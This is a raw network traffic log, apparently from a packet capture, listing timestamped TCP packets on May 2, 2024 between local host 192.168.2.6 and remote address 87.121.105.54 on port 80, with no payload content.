                                May 2, 2024 17:13:10.495080948 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.495107889 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.495333910 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.495405912 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.495505095 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.495517969 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.495636940 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.495697021 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.495863914 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.495951891 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.654110909 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654129982 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654140949 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654175043 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654233932 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.654263020 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.654381037 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654436111 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654454947 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654500961 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.654522896 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654535055 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654577971 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.654582024 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654594898 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654634953 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.654642105 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654654026 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654709101 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.654757977 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654782057 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654812098 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654830933 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.654870987 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654882908 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.654927015 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.654927015 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655288935 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655374050 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655385971 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655440092 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655458927 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655503988 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655530930 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655550003 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655582905 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655592918 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655658007 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655672073 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655690908 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655709028 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655723095 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655742884 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655787945 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655796051 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655812979 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655827045 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655833960 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655854940 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655864000 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655875921 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655888081 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655908108 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655952930 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.655955076 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655972958 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.655989885 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656002998 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656027079 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656045914 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656045914 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.656047106 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.656058073 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656076908 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656090975 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.656119108 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.656419039 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656487942 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656500101 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656533957 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.656558037 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656575918 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656614065 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656630993 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656635046 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.656657934 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.656680107 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656696081 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656723022 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.656724930 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656776905 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.656814098 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656826019 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656841993 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656857967 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.656868935 CEST804971387.121.105.54192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 17:13:10.656888962 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.656903982 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.656908989 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.656966925 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.657210112 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.657246113 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.657259941 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.657280922 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.657299042 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.657351017 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.657412052 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.657973051 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658030033 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.658128023 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658171892 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658232927 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.658303022 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658413887 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658488035 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.658531904 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658585072 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658643007 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.658752918 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658821106 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658859968 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658889055 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.658910036 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658955097 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.658997059 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659003973 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.659003973 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.659051895 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.659075975 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659125090 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659176111 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659183025 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.659233093 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659281969 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.659288883 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659390926 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659431934 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.659441948 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659502983 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659559011 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659563065 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.659596920 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659666061 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.659718037 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659869909 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.659919024 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.659939051 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660027027 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660084009 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.660093069 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660182953 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660237074 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.660296917 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660378933 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660429001 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.660439968 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660535097 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660607100 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660609007 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.660711050 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660759926 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.660804033 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660875082 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660926104 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.660940886 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.660965919 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.661015987 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.661025047 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.661071062 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.661115885 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.661128044 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.661173105 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.661233902 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.661286116 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.661462069 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.661520004 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.661573887 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.661792040 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.661855936 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.661901951 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662038088 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662094116 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.662154913 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662206888 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662260056 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.662266016 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662322044 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662389994 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.662419081 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662477970 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662550926 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662565947 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.662662983 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662709951 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.662753105 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662822962 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662883043 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662893057 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.662935972 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.662990093 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.663001060 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663085938 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663135052 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.663178921 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663222075 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663266897 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.663274050 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663326979 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663378954 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663431883 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.663441896 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663481951 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663503885 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.663553953 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663629055 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663650036 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.663693905 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663765907 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663772106 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.663814068 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663878918 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663897038 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.663938046 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663985968 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.663991928 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.664093018 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664141893 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.664206982 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664221048 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664252996 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664315939 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.664319992 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664376974 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.664377928 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664458990 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664501905 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664527893 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.664588928 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664638042 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.664680958 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664741039 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664803028 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664810896 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.664848089 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664885044 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664911985 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.664922953 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664952993 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.664974928 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.665029049 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.665085077 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.821244001 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.821295023 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.821384907 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.821399927 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.821449995 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.821501970 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.821511030 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.821558952 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.821609974 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.821609974 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.821655989 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.821754932 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.821814060 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.821877003 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.821962118 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822035074 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.822040081 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822124958 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822165012 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.822184086 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822228909 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822263956 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822285891 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.822336912 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822391033 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822436094 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.822504044 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822560072 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.822562933 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822611094 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822662115 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.822665930 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822740078 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822803020 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.822854996 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822906017 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822947979 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.822952986 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.823029995 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823112965 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823113918 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.823168039 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823215008 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.823257923 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823307991 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823364973 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823369980 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.823482990 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823551893 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823555946 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.823630095 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823674917 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.823704958 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823754072 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823816061 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823822975 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.823874950 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823926926 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.823959112 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.823983908 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.824031115 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.824038029 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.824079990 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.824122906 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.824141979 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.824178934 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.824229956 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
